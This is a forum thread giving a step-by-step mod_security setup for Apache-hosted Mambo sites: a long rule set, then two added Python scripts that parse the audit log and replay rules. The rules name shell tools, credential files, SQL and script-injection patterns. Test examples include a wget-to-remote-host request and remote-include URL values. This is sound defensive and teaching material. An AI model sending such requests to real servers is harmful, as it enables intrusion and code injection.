Mambo - Forums > Mambo 4.5.5 - Stable > Security & Performance

December 30th, 2004, 00:33   #1
cincen
MOD_SECURITY How-To: Protect your server from known and unknown web attacks

Mod_security Homepage: http://www.modsecurity.org/

This tutorial is focused on Linux servers. I only own servers with Red Hat Enterprise ES 3.0, so I cannot test on others, but it should work on any Linux server as well:

1. Get root access:

su -

2. Create a working folder and download/untar mod_security for Linux:

mkdir /root/mod_security
cd /root/mod_security/
wget http://www.modsecurity.org/download/...y-1.8.6.tar.gz
tar xzvf mod_security-1.8.6.tar.gz
cd mod_security-1.8.6


3. Enter the directory corresponding to your Apache version. In this case, let's suppose we are running Apache 2.X:

cd apache2

4. Let's build/install the module:

apxs -cia mod_security.c

On compilation, httpd.conf will be modified (it adds mod_security to be loaded in the LoadModule section).

Note: if you don't have apxs installed, you need to install the httpd-devel package.

5. Modify httpd.conf: let's add to it an AddHandler directive and an Include for our mod_security config and rules. The AddHandler directive is needed to tell Apache that PHP is dynamic content, rather than letting Apache decide by looking at MIME types. The purpose of doing this is to get /var/log/httpd/audit_log logging attacks via PHP scripts.
The location of httpd.conf may differ depending on how you installed Apache; by default it is /etc/httpd/conf/httpd.conf.

Let's do it:

--5.1 Find in httpd.conf this line or similar: AddType application/x-httpd-php .php
Add this line under it:

AddHandler php-script .php

--5.2 Go to the end of httpd.conf and place an Include for our config/rules file (use your path if different):
Include /etc/httpd/conf/modsecurity.conf

6. Content of /etc/httpd/conf/modsecurity.conf

Code:
<IfModule mod_security.c>
    # Only inspect dynamic requests
    # (YOU MUST TEST TO MAKE SURE IT WORKS AS EXPECTED)
    SecFilterEngine DynamicOnly

    # Reject requests with status 403
    SecFilterDefaultAction "deny,log,status:403"

    # Some sane defaults
    SecFilterScanPOST On
    SecFilterCheckURLEncoding On
    SecFilterCheckCookieFormat On
    SecFilterCheckUnicodeEncoding Off

    # Accept almost all byte values
    SecFilterForceByteRange 1 255

    # Server masking is optional
    # SecServerSignature "Microsoft-IIS/5.0"

    SecUploadDir /tmp
    SecUploadKeepFiles Off
 
    # Only record the interesting stuff
    SecAuditEngine RelevantOnly
    SecAuditLog logs/audit_log
 
    # You normally won't need debug logging
    SecFilterDebugLevel 0
    SecFilterDebugLog logs/modsec_debug_log

    # Only accept request encodings we know how to handle
    # we exclude GET requests from this because some (automated)
    # clients supply "text/html" as Content-Type
    SecFilterSelective REQUEST_METHOD "!^GET$" chain
    SecFilterSelective HTTP_Content-Type "!(^$|^application/x-www-form-urlencoded$|^multipart/form-data)"
 
    # Require Content-Length to be provided with
    # every POST request
    SecFilterSelective REQUEST_METHOD "^POST$" chain
    SecFilterSelective HTTP_Content-Length "^$"

    # Don't accept transfer encodings we know we don't handle
    # (and you don't need it anyway)
    SecFilterSelective HTTP_Transfer-Encoding "!^$"
 
# WEB-ATTACKS /bin/sh command attempt
SecFilter "/bin/sh"
 
# WEB-ATTACKS ps command attempt
SecFilterSelective THE_REQUEST "/bin/ps"
 
# WEB-ATTACKS /bin/ps command attempt
# SecFilterSelective THE_REQUEST "ps\x20"
 
# WEB-ATTACKS wget command attempt
SecFilter "wget\x20"
 
# WEB-ATTACKS uname -a command attempt
SecFilter "uname\x20-a"
 
# WEB-ATTACKS /usr/bin/id command attempt
SecFilter "/usr/bin/id"
 
# WEB-ATTACKS id command attempt
SecFilter "\;id"
 
# WEB-ATTACKS echo command attempt
SecFilter "/bin/echo"
 
# WEB-ATTACKS kill command attempt
SecFilter "/bin/kill"
 
# WEB-ATTACKS chmod command attempt
SecFilter "/bin/chmod"
 
# WEB-ATTACKS chgrp command attempt
SecFilter "/chgrp"
 
# WEB-ATTACKS chown command attempt
SecFilter "/chown"
 
# WEB-ATTACKS chsh command attempt
SecFilter "/usr/bin/chsh"
 
# WEB-ATTACKS tftp command attempt
SecFilter "tftp\x20"
 
# WEB-ATTACKS gcc command attempt
SecFilter "gcc\x20-o"
 
# WEB-ATTACKS cc command attempt
#SecFilter "cc\x20"
 
# WEB-ATTACKS /usr/bin/cpp command attempt
SecFilter "/usr/bin/cpp"
 
# WEB-ATTACKS cpp command attempt
SecFilter "cpp\x20"
 
# WEB-ATTACKS /usr/bin/g++ command attempt
SecFilter "/usr/bin/g\+\+"
 
# WEB-ATTACKS g++ command attempt
SecFilter "g\+\+\x20"
 
# WEB-ATTACKS bin/python access attempt
SecFilter "bin/python"
 
# WEB-ATTACKS python access attempt
SecFilter "python\x20"
 
# WEB-ATTACKS bin/tclsh execution attempt
SecFilter "bin/tclsh"
 
# WEB-ATTACKS tclsh execution attempt
SecFilter "tclsh8\x20"
 
# WEB-ATTACKS bin/nasm command attempt
SecFilter "bin/nasm"
 
# WEB-ATTACKS nasm command attempt
SecFilter "nasm\x20"
 
# WEB-ATTACKS /usr/bin/perl execution attempt
SecFilter "/usr/bin/perl"
 
# WEB-ATTACKS perl execution attempt
SecFilter "perl\x20"
 
# WEB-ATTACKS traceroute command attempt
SecFilter "traceroute\x20"

# WEB-ATTACKS ping command attempt
SecFilter "/bin/ping"
 
# WEB-ATTACKS netcat command attempt
SecFilter "nc\x20"
 
# WEB-ATTACKS nmap command attempt
SecFilter "nmap\x20"

# WEB-ATTACKS xterm command attempt
SecFilter "/usr/X11R6/bin/xterm"
 
# WEB-ATTACKS X application to remote host attempt
SecFilter "\x20-display\x20"
 
# WEB-ATTACKS lsof command attempt
SecFilter "lsof\x20"
 
# WEB-ATTACKS rm command attempt
SecFilter "rm\x20"
 
# WEB-ATTACKS mail command attempt
SecFilter "/bin/mail"
 
# WEB-ATTACKS /bin/ls command attempt
SecFilterSelective THE_REQUEST "/bin/ls"
 
# WEB-ATTACKS /etc/inetd.conf access
SecFilter "/etc/inetd\.conf" log,pass
 
# WEB-ATTACKS /etc/motd access
SecFilter "/etc/motd" log,pass
 
# WEB-ATTACKS /etc/shadow access
SecFilter "/etc/shadow" log,pass
 
# WEB-ATTACKS conf/httpd.conf attempt
SecFilter "conf/httpd\.conf" log,pass
 
# WEB-ATTACKS .htgroup access
SecFilterSelective THE_REQUEST "\.htgroup" log,pass

# WEB-CGI rksh access
SecFilterSelective THE_REQUEST "/rksh"
 
# WEB-CGI bash access
SecFilterSelective THE_REQUEST "/bash" log,pass
 
# WEB-CGI perl command attempt
SecFilterSelective THE_REQUEST "/perl\?"
 
# WEB-CGI zsh access
SecFilterSelective THE_REQUEST "/zsh"
 
# WEB-CGI csh access
SecFilterSelective THE_REQUEST "/csh"
 
# WEB-CGI tcsh access
SecFilterSelective THE_REQUEST "/tcsh"
 
# WEB-CGI rsh access
SecFilterSelective THE_REQUEST "/rsh"
 
# WEB-CGI ksh access
SecFilterSelective THE_REQUEST "/ksh"
 
# WEB-CGI icat access
SecFilterSelective THE_REQUEST "/icat" log,pass
 
# WEB-CGI /cgi-bin/ls access
SecFilterSelective THE_REQUEST "/cgi-bin/ls" log,pass
 
# WEB-CLIENT Javascript document.domain attempt
SecFilter "document\.domain\("
 
# WEB-CLIENT Javascript URL host spoofing attempt
SecFilter "javascript\://"
 
# WEB-MISC cross site scripting \(img src=javascript\) attempt
SecFilter "img src=javascript"
 
# WEB-MISC .htpasswd access
SecFilter "\.htpasswd"
 
# WEB-MISC http directory traversal
SecFilter "\.\.\\"
 
# WEB-MISC http directory traversal
SecFilter "\.\./"
 
# WEB-MISC ls%20-l
SecFilter "ls\x20-l"
 
# WEB-MISC /etc/passwd
SecFilter "/etc/passwd"
 
# WEB-MISC .htaccess access
SecFilter "\.htaccess"
 
# WEB-MISC cd..
SecFilter "cd\.\."
 
# WEB-MISC /.... access
SecFilter "/\.\.\.\."
 
# WEB-MISC cat%20 access
SecFilter "cat\x20"
 
# WEB-MISC long basic authorization string
SecFilter "Authorization\: Basic "
 
# WEB-MISC .history access
SecFilterSelective THE_REQUEST "/\.history"
 
# WEB-MISC .bash_history access
SecFilterSelective THE_REQUEST "/\.bash_history"
 
# WEB-MISC *%0a.pl access
SecFilterSelective THE_REQUEST "/*\x0a\.pl"
 
# WEB-MISC apache ?M=D directory list attempt
SecFilterSelective THE_REQUEST "/\?M=D" log,pass
 
# WEB-MISC server-status access
SecFilterSelective THE_REQUEST "/server-status" log,pass
 
# WEB-MISC Transfer-Encoding\: chunked
SecFilter "chunked"
 
# WEB-MISC perl post attempt
SecFilterSelective THE_REQUEST "/perl/" chain
SecFilter "POST"
 
# WEB-MISC mod_gzip_status access
SecFilterSelective THE_REQUEST "/mod_gzip_status" log,pass
 
# WEB-PHP squirrel mail spell-check arbitrary command attempt
SecFilterSelective THE_REQUEST "/squirrelspell/modules/check_me\.mod\.php" chain
SecFilter "SQSPELL_APP\["
 
# WEB-PHP squirrel mail theme arbitrary command attempt
SecFilterSelective THE_REQUEST "/left_main\.php" chain
SecFilter "cmdd="
 
# WEB-PHP phpbb quick-reply.php arbitrary command attempt
SecFilterSelective THE_REQUEST "/quick-reply\.php" chain
SecFilter "phpbb_root_path="
 
# WEB-PHP phpbb quick-reply.php access
SecFilterSelective THE_REQUEST "/quick-reply\.php" log,pass

# WEB-PHP remote include attempt (path=http:// passed to a .php script)
SecFilterSelective THE_REQUEST "\.php" chain
SecFilter "path=http\://"
 
# WEB-PHP Mambo uploadimage.php upload php file attempt
SecFilterSelective THE_REQUEST "/uploadimage\.php" chain
SecFilter "\.php"
 
# WEB-PHP Mambo upload.php upload php file attempt
SecFilterSelective THE_REQUEST "/upload\.php" chain
SecFilter "\.php"
 
# WEB-PHP Mambo uploadimage.php access
SecFilterSelective THE_REQUEST "/uploadimage\.php" log,pass
 
# WEB-PHP Mambo upload.php access
SecFilterSelective THE_REQUEST "/upload\.php" log,pass
 
# WEB-PHP phpBB privmsg.php access
SecFilterSelective THE_REQUEST "/privmsg\.php" log,pass

# WEB-PHP test.php access
SecFilterSelective THE_REQUEST "/test\.php" log,pass

# WEB-PHP phpBB viewtopic.php
SecFilterSelective THE_REQUEST "viewtopic\.php" chain
SecFilterSelective "THE_REQUEST|ARG_VALUES" "(system|exec|passthru|cmd|fopen|exit|fwrite)" deny,log

# EXTRAS

SecFilter "/boot"
SecFilter "/dev"
SecFilter "/etc"
SecFilter "/initrd"
SecFilter "/lost\+found"
SecFilter "/mnt"
SecFilter "/proc"
SecFilter "/root"
SecFilter "/sbin"
SecFilter "/tmp"
SecFilter "/usr/local/apache"
SecFilter "/var/spool"
SecFilter "/bin/cc"
SecFilter "/bin/gcc"
SecFilter "<[[:space:]]*script"
SecFilter "<(.|\n)+>"
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"

</IfModule>
Note: This is a basic mod_security configuration/rule set that will protect against most web attacks, but you may need to tweak it on a per-server basis.


7. Restart the Apache web server and mod_security will start protecting your server.

8. VERY IMPORTANT: examine /var/log/httpd/audit_log to see what mod_security is logging. You'll need to examine it to see if legitimate content is being blocked, and adjust/disable the conflicting rules. For example:

- These rules can conflict with phpMyAdmin if you use it:

SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"

- Some of these can conflict if you have forums where people post Linux-related stuff:

SecFilter "/boot"
SecFilter "/dev"
SecFilter "/etc"
SecFilter "/initrd"
SecFilter "/lost\+found"
SecFilter "/mnt"
SecFilter "/proc"
SecFilter "/root"
SecFilter "/sbin"
SecFilter "/tmp"
SecFilter "/usr/local/apache"
SecFilter "/var/spool"
SecFilter "/bin/cc"
SecFilter "/bin/gcc"

So you need to examine the audit log carefully and see what is being blocked, which rule is blocking it and why. You may need to watch it for some days to fine-tune it.

To test, for example, open in your browser a URL like this:
http://www.YOURDOMAIN_.com/MyMambo/index.php?var=wget http://www.xxx.xxx.xxx

You'll get a 403 permission denied. Look at the audit log for the blocked request and you'll see that the rule SecFilter "wget\x20" blocked the attack. This single rule will protect you from current and future web attacks that use wget to retrieve files and inject them onto your server (90% of web attacks).
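Step 8 of the post above says to read audit_log by hand to find rules that block legitimate traffic. The script below is an added example, not code from the thread or from the mod_security project: it parses the 1.x audit_log layout (a line of "=" characters between entries, a "Request:" line, the request headers, then the "mod_security-message:" line) and tabulates hits per rule so the false positives stand out. The three log entries embedded in it are constructed for the example in that layout; the host name and addresses in them are placeholders, and the "/phpMyAdmin/" prefix passed to likely_false_positives is an assumed trusted path. Check the regexes against a real entry from your own audit_log before relying on the output.

```python
"""Tabulate a mod_security 1.x audit_log by rule so that the tuning loop in step 8
(find the rule, decide whether the hit was legitimate, relax or drop the rule)
can be done from a summary instead of the raw log. Added example; not the
thread's code and not part of mod_security. The sample entries are constructed."""
import re
from collections import defaultdict

# Constructed sample in the 1.x audit_log layout: the wget test from the post,
# a phpMyAdmin query caught by "select.+from", and a log,pass hit (a Warning).
SAMPLE_AUDIT_LOG = """
========================================
Request: 203.0.113.5 - - [30/Dec/2004:00:41:02 -0700] "GET /MyMambo/index.php?var=wget%20http://203.0.113.9/x.txt HTTP/1.1" 403 299
Handler: php-script
----------------------------------------
GET /MyMambo/index.php?var=wget%20http://203.0.113.9/x.txt HTTP/1.1
Host: www.example.com
mod_security-message: Access denied with code 403. Pattern match "wget\\x20" at THE_REQUEST.
mod_security-action: 403

HTTP/1.1 403 Forbidden

========================================
Request: 198.51.100.7 - - [30/Dec/2004:09:12:45 -0700] "POST /phpMyAdmin/sql.php HTTP/1.1" 403 299
Handler: php-script
----------------------------------------
POST /phpMyAdmin/sql.php HTTP/1.1
Host: www.example.com
mod_security-message: Access denied with code 403. Pattern match "select.+from" at POST_PAYLOAD.
mod_security-action: 403

HTTP/1.1 403 Forbidden

========================================
Request: 203.0.113.5 - - [30/Dec/2004:00:41:09 -0700] "GET /server-status HTTP/1.1" 200 1843
Handler: server-status
----------------------------------------
GET /server-status HTTP/1.1
Host: www.example.com
mod_security-message: Warning. Pattern match "/server-status" at THE_REQUEST.

HTTP/1.1 200 OK
"""

ENTRY_SEP = re.compile(r"^=+$", re.M)
REQUEST_RE = re.compile(r'^Request: (\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3})', re.M)
MESSAGE_RE = re.compile(
    r'^mod_security-message: (Access denied with code \d+|Warning)\. '
    r'Pattern match "(.+)" at (\S+)\.', re.M)

def parse_audit_log(text):
    """One dict per entry that carries a mod_security message; other entries are skipped."""
    entries = []
    for block in ENTRY_SEP.split(text):
        req, msg = REQUEST_RE.search(block), MESSAGE_RE.search(block)
        if not (req and msg):
            continue  # not a mod_security hit, or a truncated entry
        ip, when, request_line, status = req.groups()
        outcome, pattern, location = msg.groups()
        entries.append({
            "ip": ip, "time": when, "request": request_line, "status": int(status),
            "pattern": pattern, "location": location,
            "denied": outcome.startswith("Access denied"),  # False for log,pass rules
        })
    return entries

def request_path(entry):
    return entry["request"].split(" ")[1].split("?")[0]

def hits_per_rule(entries):
    """pattern -> {hits, denied, paths}: which rule fires, how often, and on what."""
    table = defaultdict(lambda: {"hits": 0, "denied": 0, "paths": set()})
    for e in entries:
        row = table[e["pattern"]]
        row["hits"] += 1
        row["denied"] += int(e["denied"])
        row["paths"].add(request_path(e))
    return dict(table)

def likely_false_positives(entries, trusted_prefixes):
    """Patterns that denied requests under paths you know are legitimate tools
    (e.g. phpMyAdmin); these are the rules step 8 says to relax or disable."""
    prefixes = tuple(trusted_prefixes)
    return sorted({e["pattern"] for e in entries
                   if e["denied"] and request_path(e).startswith(prefixes)})

if __name__ == "__main__":
    entries = parse_audit_log(SAMPLE_AUDIT_LOG)
    for pattern, row in sorted(hits_per_rule(entries).items()):
        print(f'{row["hits"]:4} hits {row["denied"]:4} denied  {pattern:20} {sorted(row["paths"])}')
    print("review these rules:", likely_false_positives(entries, ["/phpMyAdmin/"]))
```

Run it against the real file with `parse_audit_log(open("/var/log/httpd/audit_log").read())`; rules with many denied hits on paths you recognise as your own applications are the ones to switch to log,pass or remove, while patterns like wget\x20 that only ever fire on request lines carrying remote URLs are the ones to keep.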
September 7th, 2006, 21:05   #2
jquindlen

Good stuff. This looks worthy of a bump considering a lot of people seem to be getting hacked lately.
September 15th, 2006, 10:40   #3
arnj

This sounds worth the effort. Logging script attacks is good, but I wonder if there's a way to automatically block ANY off-domain php includes while logging them? Any thoughts?
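Two things in this thread are easier to reason about with a small replay harness than by restarting Apache: the tuning loop in step 8 of the first post (which of the posted rules fire on legitimate phpMyAdmin or forum traffic) and arnj's question about blocking off-domain PHP includes. The script below is an added example, not code from the thread and not mod_security itself. It models how 1.x matched, as the post relies on: the request is URL-decoded first, SecFilter is checked against the request line and POST body, SecFilterSelective THE_REQUEST against the request line only, and patterns match case-insensitively (which is why the lower-case "select.+from" catches phpMyAdmin's upper-case queries). The patterns are copied from the posted config; the off-site include check is an assumed rule, with its 1.x form given in a comment, and the own-host exception is implemented here in Python because it does not fit in a single 1.x directive. The request lines, host name and addresses are constructed.

```python
"""Replay a few of the posted mod_security 1.x rules, plus an assumed rule for
off-site includes, against constructed requests. Added example; not the thread's
code and not mod_security. POSIX bracket classes in the posted rules are
translated because Python's re module does not understand them."""
import re
from urllib.parse import unquote, unquote_plus, urlsplit, parse_qsl

_POSIX = {"[[:space:]]": r"\s", "[[:alpha:]]": "[A-Za-z]", "[[:digit:]]": r"\d"}

def compile_rule(pattern):
    for posix, py in _POSIX.items():
        pattern = pattern.replace(posix, py)
    return re.compile(pattern, re.IGNORECASE)   # 1.x filters were case-insensitive

# (location, pattern, action) taken from the posted config; "pass" means log,pass.
RULES = [
    ("SecFilter",   r"wget\x20",               "deny"),
    ("SecFilter",   r"/etc/passwd",            "deny"),
    ("SecFilter",   r"select.+from",           "deny"),
    ("SecFilter",   r"insert[[:space:]]+into", "deny"),
    ("THE_REQUEST", r"/server-status",         "pass"),
]

# Assumed rule for arnj's question. The 1.x directive would be
#   SecFilterSelective ARG_VALUES "^(https?|ftp)://"
# (start with log,pass while tuning). The own-host allowance below is the part
# a single 1.x directive cannot express.
URL_VALUE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

def parse_request(request_line, body=""):
    _method, target, _version = request_line.split(" ", 2)
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if body:
        pairs += parse_qsl(body, keep_blank_values=True)      # SecFilterScanPOST On
    return {
        "line": unquote(request_line),        # what THE_REQUEST sees after decoding
        "body": unquote_plus(body),
        "values": [value for _name, value in pairs],  # parse_qsl already decoded them
    }

def offsite_include(values, own_hosts):
    """First parameter value that is a URL whose host is not one of our own."""
    for value in values:
        if URL_VALUE.match(value):
            host = (urlsplit(value).hostname or "").lower()
            if host not in own_hosts:
                return value
    return None

def evaluate(request_line, body="", own_hosts=frozenset()):
    """Return [(rule, action)] for every rule that fires on the request."""
    req = parse_request(request_line, body)
    hits = []
    for location, pattern, action in RULES:
        rx = compile_rule(pattern)
        if location == "SecFilter":
            matched = rx.search(req["line"]) or rx.search(req["body"])
        else:  # THE_REQUEST
            matched = rx.search(req["line"])
        if matched:
            hits.append((pattern, action))
    bad = offsite_include(req["values"], {h.lower() for h in own_hosts})
    if bad:
        hits.append(("offsite include: " + bad, "deny"))
    return hits

def verdict(hits):
    """403 on any deny hit, log-only if only pass rules fired, otherwise allow."""
    if any(action == "deny" for _rule, action in hits):
        return "deny"
    return "log" if hits else "allow"

if __name__ == "__main__":
    own = {"www.example.com"}   # assumed: the site's own host name
    for line, body in [
        ("GET /MyMambo/index.php?var=wget%20http://203.0.113.9/x.txt HTTP/1.1", ""),
        ("POST /phpMyAdmin/sql.php HTTP/1.1", "sql_query=SELECT+*+FROM+users+WHERE+id%3D1"),
        ("GET /MyMambo/index.php?path=http://203.0.113.9/c.txt HTTP/1.1", ""),
        ("GET /MyMambo/index.php?path=http://www.example.com/c.txt HTTP/1.1", ""),
        ("GET /server-status HTTP/1.1", ""),
    ]:
        hits = evaluate(line, body, own)
        print(f"{verdict(hits):5}  {line}  {hits}")
```

The second request shows the phpMyAdmin conflict the first post warns about: a perfectly normal query is denied by "select.+from", so that rule has to be relaxed (or scoped away from /phpMyAdmin/) if the tool is in use. The third and fourth requests show the off-site include check: a parameter pointing at a foreign host is denied, the same parameter pointing at the site's own host is allowed, which is the behaviour arnj asked for.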